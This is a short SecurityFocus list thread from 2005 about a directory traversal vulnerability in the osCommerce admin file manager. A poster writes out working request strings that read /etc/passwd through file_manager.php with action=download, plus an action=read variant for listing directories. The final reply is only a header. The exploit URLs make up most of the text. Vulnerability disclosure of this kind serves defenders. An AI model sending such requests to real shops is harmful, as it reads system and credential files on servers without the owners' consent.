SecurityFocus

osCommerce File Manager Directory Traversal Vulnerability Mar 22 2005 04:32PM
Megasky (magasky hotmail com) (1 replies)

there is allready a post on this that have
file_manager.php?action=download&filename=../../../../../../etc/passwd

sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../

[ reply ]

Re: osCommerce File Manager Directory Traversal Vulnerability Mar 23 2005 05:48AM
Aikanáro Calaelen (aikanaro calaelen gmail com)